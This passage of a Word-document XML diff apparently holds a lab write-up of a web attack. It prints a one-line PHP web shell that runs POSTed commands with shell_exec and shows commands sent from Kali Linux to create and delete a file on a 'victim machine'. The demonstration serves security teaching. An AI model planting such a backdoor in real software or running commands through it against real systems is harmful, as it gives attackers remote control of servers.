+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>&lt;/body&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>&lt;/html&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>he php code shows below:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>&lt;?php</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>$command=$_POST['command'];</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>echo shell_exec($command);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>?&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>O</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>bviously, the PHP code allows permissions of remote shell execution (reverse shell)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> thus we could use this security backdoor to create a reverse shell on victim machine by web exploits.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">he Kali Linux </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>the</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>refore browser the vulnerable website and run following commands:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>l</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>s -l ~/Desktop</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>cho test&gt;~/Desktop/9337.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
         <w:t>I</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">n the victim machine desktop, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>we</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> do:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>ls ~/Desktop</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>at ~/Desktop/9337.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>The screen record proves “test” displayed on the victim machine desktop, then Kali runs:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>r</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>m ~/Desktop/9337.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>hen the victim machine runs:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>ls ~/Desktop</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>at ~/Desktop/9337.txt (ERROR RETURNS, NO FILE)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>nd the screen record proves that in the victim machine desktop, there is no 9337.txt exist.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
